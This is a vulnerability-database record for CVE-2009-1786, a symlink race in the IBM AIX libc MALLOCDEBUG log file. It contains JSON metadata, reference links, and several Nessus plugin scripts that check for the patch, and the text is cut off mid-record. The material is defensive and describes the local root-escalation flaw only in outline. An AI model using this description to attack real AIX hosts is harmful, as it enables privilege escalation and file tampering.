ID CVE-2009-1786Type cveReporter NVDModified 2017-09-28T21:34:33
Description
The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.
{"id": "CVE-2009-1786", "bulletinFamily": "NVD", "title": "CVE-2009-1786", "description": "The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.", "published": "2009-05-26T11:30:05", "modified": "2017-09-28T21:34:33", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1786", "reporter": "NVD", "references": ["http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50129", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50517", "https://www.exploit-db.com/exploits/9306", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50636", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50445", "http://www.vupen.com/english/advisories/2009/1380", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50121", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50139", "http://securitytracker.com/id?1022261", "http://www.securityfocus.com/bid/35034", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50500", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50447", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=802"], "cvelist": ["CVE-2009-1786"], "type": "cve", "lastseen": "2017-09-29T14:26:37", "history": [{"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:ibm:aix:6.1", "cpe:/o:ibm:aix:5.3"], "cvelist": ["CVE-2009-1786"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.", "edition": 1, "enchantments": {}, "hash": "ebae3fe06fbcc50bd54b877a85690241ce9f0c0ee6c7f47051cd39088c9cccbc", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "2837615eda414186429d259c63538585", "key": "cvelist"}, {"hash": "1cdedeed0813fbf2cd550457e5a39315", "key": "modified"}, {"hash": "e1ad4aec00bbd563078899d589a946bd", "key": "description"}, {"hash": "00ec1b8e9a79c0c6fb360773f2467ed4", "key": "title"}, {"hash": "5ebc2695205cd128c1b4f16c7c42442e", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "c69fd1e76d15c60586f67ca66d7fe7d4", "key": "assessment"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97c7e662cb5d434a9d1bc13081eeced7", "key": "scanner"}, {"hash": "609efa1f1196205cf6090008f54b5ccf", "key": "cpe"}, {"hash": "f0243036bf6f9d24bb38e09fc313c870", "key": "published"}, {"hash": "de1511a16054562d3e6b6349b352e617", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1786", "id": "CVE-2009-1786", "lastseen": "2016-09-03T12:26:04", "modified": "2010-08-21T01:32:39", "objectVersion": "1.2", "published": "2009-05-26T11:30:05", "references": ["http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50129", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50517", "http://xforce.iss.net/xforce/xfdb/50636", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50445", "http://www.vupen.com/english/advisories/2009/1380", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50121", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50139", "http://www.milw0rm.com/exploits/9306", "http://securitytracker.com/id?1022261", "http://www.securityfocus.com/bid/35034", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50500", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50447", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=802"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2009-1786", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T12:26:04"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:ibm:aix:6.1", "cpe:/o:ibm:aix:5.3"], "cvelist": ["CVE-2009-1786"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.", "edition": 2, "enchantments": {}, "hash": "5849d1727d1b16bbf7bf37c07f3e5bd7841266078ba53316fbcaa443f834c08d", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "cd38b3d3631380c87673a95e58a4f183", "key": "references"}, {"hash": "2837615eda414186429d259c63538585", "key": "cvelist"}, {"hash": "e1ad4aec00bbd563078899d589a946bd", "key": "description"}, {"hash": "00ec1b8e9a79c0c6fb360773f2467ed4", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "c69fd1e76d15c60586f67ca66d7fe7d4", "key": "assessment"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97c7e662cb5d434a9d1bc13081eeced7", "key": "scanner"}, {"hash": "609efa1f1196205cf6090008f54b5ccf", "key": "cpe"}, {"hash": "f0243036bf6f9d24bb38e09fc313c870", "key": "published"}, {"hash": "484445e54206546c38eeb1b876c04f03", "key": "modified"}, {"hash": "de1511a16054562d3e6b6349b352e617", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1786", "id": "CVE-2009-1786", "lastseen": "2017-08-17T11:14:21", "modified": "2017-08-16T21:30:30", "objectVersion": "1.3", "published": "2009-05-26T11:30:05", "references": ["http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50129", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50517", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50636", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50445", "http://www.vupen.com/english/advisories/2009/1380", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50121", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50139", "http://www.milw0rm.com/exploits/9306", "http://securitytracker.com/id?1022261", "http://www.securityfocus.com/bid/35034", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50500", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50447", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=802"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2009-1786", "type": "cve", "viewCount": 0}, "differentElements": ["references", "assessment", "modified"], "edition": 2, "lastseen": "2017-08-17T11:14:21"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6ce8fb166d9146873362979cd7146812"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "609efa1f1196205cf6090008f54b5ccf"}, {"key": "cvelist", "hash": "2837615eda414186429d259c63538585"}, {"key": "cvss", "hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9"}, {"key": "description", "hash": "e1ad4aec00bbd563078899d589a946bd"}, {"key": "href", "hash": "de1511a16054562d3e6b6349b352e617"}, {"key": "modified", "hash": "9461523ec39e20b63d29099578037f93"}, {"key": "published", "hash": "f0243036bf6f9d24bb38e09fc313c870"}, {"key": "references", "hash": "e296db26ec3f99fbbbf0af3cc640ed28"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "97c7e662cb5d434a9d1bc13081eeced7"}, {"key": "title", "hash": "00ec1b8e9a79c0c6fb360773f2467ed4"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "092ed376400c008e6a47f45907ceb24b9bb92345541d25da09041dbe6adf4061", "viewCount": 0, "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2017-09-29T14:26:37"}, "dependencies": {"references": [{"type": "nessus", "idList": ["AIX_IZ50447.NASL", "AIX_IZ50121.NASL", "AIX_IZ50517.NASL", "AIX_IZ50445.NASL", "AIX_IZ50139.NASL", "AIX_IZ50129.NASL", "AIX_IZ50500.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:33001"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139565"]}], "modified": "2017-09-29T14:26:37"}, "vulnersScore": 2.1}, "objectVersion": "1.3", "cpe": ["cpe:/o:ibm:aix:6.1", "cpe:/o:ibm:aix:5.3"], "assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}]}
{"nessus": [{"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50517.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64331", "title": "AIX 5.3 TL 7 : libc (IZ50517)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64331);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 7 : libc (IZ50517)\");\n script_summary(english:\"Check for APAR IZ50517\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"07\", patch:\"IZ50517_07\", package:\"bos.rte.libc\", minfilesetver:\"5.3.7.0\", maxfilesetver:\"5.3.7.8\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"07\", patch:\"IZ50517_07\", package:\"bos.adt.prof\", minfilesetver:\"5.3.7.0\", maxfilesetver:\"5.3.7.8\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50445.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64328", "title": "AIX 5.3 TL 9 : libc (IZ50445)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64328);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 9 : libc (IZ50445)\");\n script_summary(english:\"Check for APAR IZ50445\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"09\", patch:\"IZ50445_09\", package:\"bos.rte.libc\", minfilesetver:\"5.3.9.0\", maxfilesetver:\"5.3.9.2\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"09\", patch:\"IZ50445_09\", package:\"bos.adt.prof\", minfilesetver:\"5.3.9.0\", maxfilesetver:\"5.3.9.2\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50121.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64325", "title": "AIX 6.1 TL 2 : libc (IZ50121)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64325);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 2 : libc (IZ50121)\");\n script_summary(english:\"Check for APAR IZ50121\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ50121_02\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ50121_02\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50447.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64329", "title": "AIX 5.3 TL 8 : libc (IZ50447)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64329);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 8 : libc (IZ50447)\");\n script_summary(english:\"Check for APAR IZ50447\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"08\", patch:\"IZ50447_08\", package:\"bos.rte.libc\", minfilesetver:\"5.3.8.0\", maxfilesetver:\"5.3.8.5\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"08\", patch:\"IZ50447_08\", package:\"bos.adt.prof\", minfilesetver:\"5.3.8.0\", maxfilesetver:\"5.3.8.5\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50139.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64327", "title": "AIX 6.1 TL 0 : libc (IZ50139)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64327);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 0 : libc (IZ50139)\");\n script_summary(english:\"Check for APAR IZ50139\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", 